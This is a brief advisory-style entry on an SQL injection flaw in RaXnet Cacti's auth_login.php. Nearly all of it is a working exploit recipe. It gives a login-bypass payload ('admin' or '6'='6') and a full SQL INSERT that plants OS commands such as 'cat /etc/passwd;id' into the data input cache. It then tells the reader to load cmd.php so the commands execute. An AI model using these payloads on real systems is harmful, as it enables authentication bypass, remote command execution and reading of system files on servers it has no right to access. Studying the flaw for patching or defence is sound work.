|
RaXnet Cacti Auth_Login.PHP SQL Injection Vulnerability
The following examples are available: username = admin' or '6'='6 password = password wished insert into data_input_data_cache (local_data_id, host_id, data_input_id, action, command, hostname, snmp_community, snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout, rrd_name, rrd_path, rrd_num, arg1, arg2, arg3) values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some script', '127.0.0.1', '', '1', '', '', '161', '500', 'hack', '/', '3', 'NULL', 'NULL', 'NULL'); Then points to http://www.example.com/cacti/cmd.php and the command will be executed. |
|
|
Privacy Statement |